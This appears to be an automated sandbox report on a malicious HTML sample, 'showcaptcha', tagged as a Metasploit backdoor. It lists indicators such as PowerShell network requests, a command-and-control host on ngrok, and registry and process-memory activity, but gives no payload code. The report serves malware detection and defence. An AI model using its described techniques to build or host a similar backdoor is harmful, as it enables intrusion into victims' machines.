Malware Analysis Report

2024-09-23 04:18

Sample ID 240617-s8hcnavgpb
Target showcaptcha
SHA256 5934e81a30bd867068c77a66b807996d7fc35c3328e81865fce4190717e79214
Tags
metasploit backdoor trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5934e81a30bd867068c77a66b807996d7fc35c3328e81865fce4190717e79214

Threat Level: Known bad

The file showcaptcha was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor trojan

MetaSploit

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-17 15:47

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 15:47

Reported

2024-06-17 16:18

Platform

win10v2004-20240226-en

Max time kernel

1795s

Max time network

1802s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html

Signatures

MetaSploit

trojan backdoor metasploit

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631128871173952" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3420 wrote to memory of 1620 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 1620 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4384 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
